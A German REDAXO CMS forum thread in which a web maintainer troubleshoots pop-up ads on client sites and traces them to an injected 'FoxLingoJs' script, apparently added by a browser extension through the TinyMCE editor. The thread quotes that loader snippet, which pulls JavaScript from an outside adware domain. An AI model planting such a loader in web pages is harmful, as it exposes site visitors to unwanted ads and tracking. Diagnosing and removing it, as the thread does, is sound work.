REDAXO Forum

Hallo und HILFE !!!

Folgendes Problem tritt seit einigen Tage bei unterschiedlichen Kunden auf:
Nach einigen Klicks (unterschiedlicher Anzahl) erscheint plötzlich in einem neuen Fenster mal eine Umfrage, mal ein Gewinnspiel. Heißt also - irgendwo ist ein Hack auf der Seit o.ä.

Zwei Systeme waren 4.4.1 - hier habe ich das TinyModul schon getauscht. Eine andere Seite habe ich komplett auf 4.6.1. und Tiny 2.5 geswitcht und die Sicherung wieder eingespielt. Trotzdem ist das hier immer noch?!

Hat jemand eine Idee was ich tun kann bzw. wo sich das "versteckt" um das zu eliminieren?!

Danke, Tim Pohlmann

Klingt schon nach nem Hack. Du musst halt mal die Seite analysieren z.B. mit Firebug und schauen woher die Fenster geöffnet werden. Vermutlich wurden die Javascript-Dateien manipuliert also kannst du da auch mal einen Blick reinwerfen.

Filezilla + Windows + Trojaner evtl. im Spiel?

Rüdiger

Es gibt keine bekannte Sicherheitslücke in REDAXO. Aber es ist äußert schwierig, dass Script / Problem zu finden und zu entfernen. Hatte das bei einigen Kunden auch schon erlebt und diese Scripte haben sich an unterschiedlichsten Stellen reingeflanscht.

D.h, sehr penibel ALLES durchschauen. Dateisystem, Templates und Module. Alles was seltsam ist erstmal ausschalten oder entfernen. Pauschal lässt sich aber schwer helfen.

lg

Jan

Bei allen uns bekannten Fällen waren es entweder ausgelesene FTP-Zugangsdaten oder Drittskripte, die mit im Account lagen und vergessen worden sind (phpMyAdmin für Agenturen, alte Wordpress & Co. sind da beliebte Kandidaten).

Rüdiger

.... ok, ich werde mal auf die Suche gehen, wobei das allerdings auch bei zwei Seiten aufgetreten ist, an denen wir die letzten Monate selber nicht dran waren, also das nicht von einem einzelnen Arbeitsplatz dort reingekommen ist. Zudem auch bei unterschiedlichen Anbietern mit versch. Zugangsdaten.

Danke schon mal bis hierher.

Hallo,

ich habe nun etwas geforscht und in manchen Seiten ein Script gefunden (nur in den Artikeln im html zu sehen NICHT in der Datenbank):

<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxl ... ction(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
// ]]></script>

Kann es daran liegen?!
Allerdings ist KEIN ADON im Browser (wedre bei mir noch beim Kunden) installiert und auf allen Rechnern, die mit den Seiten arbeiten hat ein Virenscan nichts gefunden. Was kann ich nun machen und woher kommt das? Ich stehe noch etwas auf dem Schlauch....

Meine Kunden sind arg abgenervt da auch zeitweise sexistische Einblendungen kommen.
Über Hilfe würde ich mich freuen.

Danke und Gruß

Na entferns doch einfach, dann siehst du doch ob es daran liegt

Liegt definitiv nur REDAXO in den Accounts? Sind die FTP-Passwörter alle zurückgesetzt, was sagen die Logfiles des Hosters? Sind irgendwelche externen Datenquellen in die Seiten eingebunden?

Rüdiger

Moin,

wie hast du das Problem denn bisher eingegrenzt? Schon ein Backup eingespielt? Auf einer unserer Websites hatte sich mal ein Hack über den FTP-Zugang des Kunden eingeschlichen und einfach ein paar Zeilen an eine der Startdateien angehängt, das ließ sich recht leicht am Datum der Dateien nachvollziehen. Hast du ansonsten definitiv ausgeschlossen, dass es eine FF Erweiterung ist? Laut Google scheint es da öfter Probleme zu geben.
Ist das Skript auch in der Quelltextansicht (Ctrl+U) oder nur über Firebug zu finden?

...es ist nur Radxo auf den Servern (Plesk Oberfläche) - es betrifft derezti auch nur zwei Seiten mit dem 4.4.1 er System und altem TinyMCE (habe ich schon geupdated). Ich werde das eine System nue aufspielen, da die Datenbank "sauber" zu sein scheint und dann mal sehen ob alles weg ist....

Das Script ist nun überall raus - und immer noch ist der Hack drin ......

Danke und Gruß, Tim

Also, alles zurück - das o.g. Script wurde in die datenbank geschrieben !?!
ich habe es dann in 14 Artikel Slice gefunden.

Ich würde das so erklären: Einer der Redakteure hat die FF-Erweiterung FoxLingo installiert, die ein Script zur Übersetzung (und Werbung) in Websites integriert, das hängt sich auch an die Editortexte dran und wird beim Speichern ungewollt ins Modul aufgenommen, wo es dann auch für alle, die die Erweiterung nicht haben das entsprechende Skript lädt. Scheint ein gängiges Problem bei allen CMS mit TinyMCE Texteditor zu sein (https://www.google.de/search?q=FoxLingo ... 8QfcuIDACQ)
Ich hatte letztens ein ähnliches Problem mit der Pinterest Erweiterung vom FF.

Vielleicht fragst Du mal nach, ob FoxLingo von einem der Redakteure genutzt wird.